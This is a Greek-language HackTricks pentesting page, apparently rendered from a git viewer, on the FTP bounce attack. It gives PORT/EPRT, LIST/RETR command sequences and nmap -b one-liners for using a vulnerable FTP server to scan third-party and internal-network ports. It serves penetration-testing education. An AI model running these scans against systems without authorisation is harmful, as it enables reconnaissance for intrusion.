hacktricks/network-services-pentesting/pentesting-ftp/ftp-bounce-attack.md
Translator workflow 35c6b081d2 Translated to Greek
2024-02-10 22:40:18 +00:00

5.1 KiB
Raw Blame History

Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

FTP Bounce - Σάρωση

Εγχειρίδιο

  1. Συνδεθείτε στο ευάλωτο FTP
  2. Χρησιμοποιήστε την εντολή PORT ή EPRT (αλλά μόνο μία από αυτές) για να καταστήσετε τη σύνδεση με το <IP:Port> που θέλετε να σαρώσετε:

PORT 172,32,80,80,0,8080
EPRT |2|172.32.80.80|8080| 3. Χρησιμοποιήστε την εντολή LIST (αυτό θα στείλει απλά στο συνδεδεμένο <IP:Port> τη λίστα των τρεχουσών αρχείων στον φάκελο FTP) και ελέγξτε τις πιθανές απαντήσεις: 150 File status okay (Αυτό σημαίνει ότι η θύρα είναι ανοιχτή) ή 425 No connection established (Αυτό σημαίνει ότι η θύρα είναι κλειστή)

  1. Αντί για την εντολή LIST μπορείτε επίσης να χρησιμοποιήσετε την εντολή RETR /file/in/ftp και να αναζητήσετε παρόμοιες απαντήσεις Open/Close.

Παράδειγμα χρησιμοποιώντας την εντολή PORT (η θύρα 8080 του 172.32.80.80 είναι ανοιχτή και η θύρα 7777 είναι κλειστή):

Το ίδιο παράδειγμα χρησιμοποιώντας την εντολή EPRT (η ταυτοποίηση παραλείπεται στην εικόνα):

Ανοιχτή θύρα χρησιμοποιώντας την εντολή EPRT αντί για την εντολή LIST (διαφορετικό περιβάλλον)

nmap

nmap -b <name>:<pass>@<ftp_server> <victim>
nmap -Pn -v -p 21,80 -b ftp:ftp@10.2.1.5 127.0.0.1 #Scan ports 21,80 of the FTP
nmap -v -p 21,22,445,80,443 -b ftp:ftp@10.2.1.5 192.168.0.1/24 #Scan the internal network (of the FTP) ports 21,22,445,80,443
Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks: